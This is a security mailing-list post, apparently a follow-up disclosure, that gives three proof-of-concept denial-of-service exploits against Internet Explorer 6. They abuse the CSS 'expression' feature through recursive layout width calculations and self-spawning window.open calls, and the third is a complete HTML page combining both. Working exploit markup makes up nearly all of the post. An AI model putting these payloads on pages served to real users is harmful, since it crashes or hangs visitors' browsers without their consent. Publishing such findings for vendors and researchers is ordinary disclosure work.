<<< Date Index >>>     <<< Thread Index >>>

Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)



Note:
I'm sorry, two of the the exploits in the prior e-mail were incomplete.

This is just another couple of proof of concept exploits for this well-known browser. The third one is a lame combination of both.

Tested under Windows XP SP2, MSIE 6.0.2900.2180

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width: expression(document.getElementById('foo').offsetWidth+'px');">
   <tr><td></td></tr>
   </table>
</div>


Exploit 2
<div style="width: expression(window.open(self.location));">
   &nbsp;
</div>

Exploit 3
<html>
   <head>
       <title>Another non-standards compliant IE D.O.S.</title>
   </head>
   <body>
       <div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">
           <tr>
               <td>
                   IE makes my life harder :(. It sucks, don't use it :).
               </td>
           </tr>
           </table>
       </div>
       Written by <a href="http://xiam.be";>xiam</a>.<br />
       Tested under IE 6.0.2900.2180
   </body>
</html>

--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be